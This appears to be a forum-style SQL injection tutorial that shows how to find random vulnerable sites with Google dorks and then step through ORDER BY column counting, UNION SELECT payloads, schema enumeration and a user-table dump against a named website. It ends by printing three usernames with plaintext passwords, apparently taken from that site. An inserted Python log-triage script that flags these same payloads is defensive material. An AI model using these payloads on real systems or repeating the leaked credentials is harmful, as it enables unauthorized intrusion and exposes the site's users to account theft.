sql injection complete tutorial by tha-pentester


okay, first find a vulnerable website
to get vulnerable websites
open google.com
and type one of these dorks


inurl:/index.php?id=
inurl:/news.php?id=
inurl:/page.php?id=
inurl:/view.php?id=
inurl:/item.php?id=

well there is a huge list of google dorks
you can get these from google
okay

when you type one of the google dorks, thousands of sites
will be listed
now open a website and type ' at the end of the url
if you get this error


then the website is vuln and you can try to hack it



okay now that you have this error

now you need to find the number of columns

now remove ' and type

order by 1(syntax)
now your url will be like
www.brew-monkey.com/news.php?id=465 order by 1

if you don't get any error then increase the number
www.brew-monkey.com/news.php?id=465 order by 2 (no error)
www.brew-monkey.com/news.php?id=465 order by 3 (no error)
www.brew-monkey.com/news.php?id=465 order by 4 (no error)
www.brew-monkey.com/news.php?id=465 order by 5 (no error)

www.brew-monkey.com/news.php?id=465 order by 6
ohh error came here

Unknown column '6' in 'order clause'

so the number of columns in this website is 5

now it's time to use the union all select statement

okay as we know our website has 5 columns
now we need to find the vuln columns

for that use this syntax

www.brew-monkey.com/news.php?id=465 union all select 1,2,3,4,5--


now see the pic 3


here you can clearly see some bold numbers

in this website the number is 3

that means the string column is 3

okay

now let's check the MySQL version of the website

to check this you need to replace your url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,@@version,4,5--



okay now see the pic 4


you can clearly see in this pic that

where the column number was written, something has changed and that is the
database version

okay if the number is greater than or = 5 then it's good
because it's easy to crack
if it's below then the sql injection is blind
(it does not mean that you can't crack the db but we have to guess
the table names and all)

okay



so now as we have checked this
now we're gonna crack its db
okay
let's find the tables of this database
okay now replace the url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()

if it does not work then use

www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

wow see the pic 5 below



we have all its tables now

now we have to check its tables and find some table with sensitive information

it may be admin, users, usergroups etc



okay so here i'm trying to crack this table

cpg131_users


okay so now we need to replace our url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,column_name,4,5 from information_schema.columns where table_name=cpg131_users

install hackbar (a firefox add-on) as i have
now click on sql > mysql > Mysqlchar
and type the table name
then you will get its value

now the decimal value of cpg131_users is (99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

okay copy it and replace the url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

well it's working

see pic 6



now we need to fetch data of columns

now in this website
the information is in columns


user_name
user_password

okay to fetch these

replace the url with

http://www.brew-monkey.com/news.php?...cpg131_users--
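
every step above ends up url-encoded in the web server's access log, so the whole sequence is easy to spot from the defending side. the script below is an added example, not part of the original tutorial: the log lines are constructed, the client IPs are documentation addresses, and the rule names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (combined format); client IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /news.php?id=465%27 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:09 +0000] "GET /news.php?id=465+order+by+5 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Oct/2023:13:55:12 +0000] "GET /news.php?id=465%20order%20by%206 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:30 +0000] "GET /news.php?id=465+union+all+select+1,2,@@version,4,5-- HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=465+union+all+select+1,2,group_concat(table_name),4,5+from+information_schema.tables HTTP/1.1" 200 2048',
    '198.51.100.20 - - [10/Oct/2023:13:57:00 +0000] "GET /news.php?id=465 HTTP/1.1" 200 2048',
    '198.51.100.20 - - [10/Oct/2023:13:57:05 +0000] "GET /search.php?q=order+by+mail HTTP/1.1" 200 2048',
]

# Client IP and request URI of a common/combined-format log entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<uri>\S+) [^"]*" \d{3}')

# One rule per step of the walkthrough (rule names are this example's own).
RULES = {
    "quote_probe":   re.compile(r"=[^&]*'\s*(?:&|$)"),
    "order_by_scan": re.compile(r"\border\s+by\s+(\d+)"),
    "union_select":  re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "version_read":  re.compile(r"@@version"),
    "schema_enum":   re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)"),
}

def triage(lines):
    """Return {client_ip: {"rules": set of rule names, "order_by_max": int}}."""
    hits = defaultdict(lambda: {"rules": set(), "order_by_max": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode %xx and '+', lowercase, squeeze whitespace, keep only the query string.
        query = re.sub(r"\s+", " ", unquote_plus(m["uri"]).lower()).partition("?")[2]
        for name, rule in RULES.items():
            found = rule.search(query)
            if not found:
                continue
            entry = hits[m["ip"]]
            entry["rules"].add(name)
            if name == "order_by_scan":  # highest column index the client tried
                entry["order_by_max"] = max(entry["order_by_max"], int(found.group(1)))
    return dict(hits)

if __name__ == "__main__":
    for ip, info in triage(SAMPLE_LOG).items():
        print(ip, sorted(info["rules"]), "highest ORDER BY index:", info["order_by_max"])
```

a match only marks a client for review. the fix on the application side is to bind id as a query parameter (or cast it to an integer) so that none of these strings ever reach the SQL parser.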



wow

we have done it guyz..

there are 3 users in this database

brewmonkey_admin:beavis01
chris:ob5c3n3,mara:0re0gasm
Kevin:kevinspassword


i hope u like this tutorial.

well this tutorial took me 1 hour to create
and if u like it, it will take only 1 second to press the thanks button
